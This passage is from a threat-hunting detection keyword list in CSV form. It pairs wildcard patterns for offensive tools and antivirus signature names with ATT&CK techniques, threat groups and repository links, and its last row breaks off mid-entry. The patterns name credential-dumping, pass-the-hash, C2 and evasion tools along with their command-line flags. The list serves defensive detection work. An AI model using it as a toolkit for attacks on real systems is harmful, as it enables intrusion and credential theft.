-*guardicore*monkey*,offensive_tool_keyword,Github Username,Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data centers resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server,T1566 - T1569 - T1570 - T1571 - T1572 - T1573,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/h0nus,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*guardicore/monkey*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*guida.exe -*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -*gunicorn ares:app*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*Gupt-Backdoor.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg==*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*-H lm-hash:nt-hash*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*-H 'LMHASH:NTHASH'*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*-H 'NTHASH'*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*h2csmuggler --scan-list *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*h2csmuggler -x * --test*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*h8mail -*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,0,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z -*h8mail -t *@*.*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*h8mail*,offensive_tool_keyword,h8mail,h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/khast3x/h8mail,1,0,N/A,N/A,10,3553,480,2023-08-15T10:50:34Z,2018-06-15T02:47:00Z -*Ha3MrX/Gemail-Hack*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/Ha3MrX/Gemail-Hack,1,1,N/A,7,9,813,385,2022-02-18T16:12:45Z,2018-04-19T13:48:41Z -*haad/proxychains*,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,1,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -*hackbrowersdata.cna*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*hack-browser-data.exe*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,1,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*hack-browser-data/*,offensive_tool_keyword,cobaltstrike,C# binary with embeded golang hack-browser-data,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData,1,1,N/A,10,10,84,15,2021-12-09T18:58:27Z,2020-12-06T12:28:47Z -*HACKER*FUCKER*Xeroxxx*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*hackertarget-get-rootdomains *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*hackingtool.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*Hackndo/sprayhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Hackndo/sprayhound*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*hackndo@gmail.com*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*Hackplayers/evil-winrm*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hackrf_sweep -f *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*hacksysteam/CVE-2023-*,offensive_tool_keyword,POC,Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hacksysteam/CVE-2023-21608,1,1,N/A,N/A,3,250,57,2023-02-27T04:51:20Z,2023-01-30T12:57:48Z -*HackTheWorld*,offensive_tool_keyword,HackTheWorld,An Python Script For Generating Payloads that Bypasses All Antivirus so far.,T1566 - T1106 - T1027 - T1059 - T1070,TA0002 - TA0005 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/stormshadow07/HackTheWorld,1,0,N/A,N/A,9,866,179,2020-04-28T20:17:54Z,2018-02-17T11:46:40Z -*hacktool*,signature_keyword,Antivirus Signature,hacktool keyword. a repository could be named as such. o AV signature,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,hacktool signatures,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool.ASP.*.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool.HTML.*.**,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool.Java.*.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Hacktool.Lazagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Hacktool.Linux*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*HackTool.PHP.*.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Hacktool.Windows*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Hacktool/Win.*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*HackTool:Linux*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:MSIL*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:PowerShell*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:PowerShell/*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*HackTool:Python*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:Python/*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Hacktool:SH*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:VBS*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:Win32*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:Win32*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*HackTool:Win64*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HackTool:Win64*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*hacktools-*.xpi*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*Hack-Tools-master*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*Hack-with-Github*,offensive_tool_keyword,Github Username,An Open Source Hacking Tools database,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Hack-with-Github,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*hades_directsys.exe*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*HadesLdr-main*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*hak5/omg-payloads*,offensive_tool_keyword,omg-payloads,Official payload library for the O.MG line of products from Mischief Gadgets,T1200 - T1095 - T1059.006 - T1027,TA0010 - TA0011,N/A,N/A,Hardware,https://github.com/hak5/omg-payloads,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*haKCers.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*hakluke/hakrawler*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,1,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*hakrawler -*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*hakrawler.go*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,1,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*hakrawler@latest*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*hakrawler-ip-range*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*hakrawler-master*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,1,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*haktrails subdomains*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*Hakumarachi/Bropper*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,1,N/A,N/A,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*handelsregister-get-company-names *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*handle_nessus_file*,offensive_tool_keyword,crackmapexec,function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*handlekatz.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*handlekatz.x64.*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com//EspressoCake/HandleKatz_BOF,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*handlekatz_bof.*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com//EspressoCake/HandleKatz_BOF,1,1,N/A,10,,N/A,,, -*handlekatz_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*HANDLEKATZ_EXE_NAME=*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*Hangingsword/HouQing*,offensive_tool_keyword,cobaltstrike,Hou Qing-Advanced AV Evasion Tool For Red Team Ops,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 